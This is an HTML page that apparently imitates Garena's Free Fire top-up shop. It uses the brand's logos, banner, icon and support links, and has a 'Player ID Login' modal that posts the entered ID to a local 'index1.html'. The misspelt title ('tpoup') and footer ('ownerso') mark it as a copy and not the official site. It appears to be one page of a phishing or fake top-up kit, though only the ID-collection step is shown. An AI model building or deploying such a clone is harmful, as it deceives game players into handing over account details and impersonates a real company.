<html><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>freefire garena-tpoup</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<style>
    h5{
      font-size: 10px;
    }
    h6{
      font-size: 15px;
    }
    button{
      height: 40px;
      width: 80px;
    }
    yellow{
      color: rgb(225,196,0);
    }
    sup{
      font-size: 10px;
      color: rgb(225,196,0);
    }
    .gh{
      position: relative;
      min-height: 300px;
    }
    footer{
      position: absolute;
      bottom: 0px;
      width: 100%;
    }
    ul{
      padding-bottom: 2.5rem;
    }
  </style>
</head>
<body>
<div id="vh">
<div class="col">
<img src="https://i.pinimg.com/originals/5b/93/4b/5b934b6173899b4c001ae6a4d3b11378.png" alt="" width="28%" style="padding-top: 9px;padding-bottom: 9px;">
</div>
<div>
<input type="image" name="" id="" src="https://contentgarena-a.akamaihd.net/GOP/newshop_banners/indiapc.jpg?v=1583463934" alt="" width="100%" height="65px">
</div>
<ul class="list-group">
<li class="list-group-item"><center>Select your game to topup</center></li>
</ul>
<ul class="list-group col-6" data-toggle="modal" data-target="#exampleModalCenter">
<li class="list-group-item" width="50%"><center>
<img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/100/067/icon.png" alt="" height="100px"><br><br>
Free Fire
</center>
</li>
</ul>
</div>
<footer class=" page-footer font-small blue">

<div class="footer-copyright text-center py-3" style="font-size: 14px;"><a href="https://ffsupport.zendesk.com/" style="color:gray; padding-left:15px; padding-right:15px;">© Customer Support</a><hr>
<a href="#" style="color:gray; padding-left:15px; padding-right:15px;">©2020 act. Trademarks belong to the respective ownerso. All rights reserved</a><br>
<a href="https://ffsupport.zendesk.com/" style="color:gray; padding-left:15px; padding-right:5px;">FAQ</a><a href="https://www.garena.sg/terms" style="color:gray; padding-left:15px; padding-right:5px;">Terms and Conditions</a><a href="https://www.garena.sg/privacy" style="color:gray; padding-left:5px; padding-right:5px;">Privacy Policy</a>
</div>

</footer>
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<img height="45px" src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/100/067/icon.png"><h4 class="modal-title" id="exampleModalLongTitle" style="padding-left:5px;">Player ID Login</h4>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<form action="index1.html" name="myForm" method="post">
<div class="modal-body form-group">
<input type="number" name="id" min="999999" class="form-control" placeholder="Free Fire ID" required="">
</div>
<div class="modal-footer">
<button type="submit" class="btn btn-block btn-primary">Login</button>
</div>
</form>
</div>
</div>
</div>

</body></html>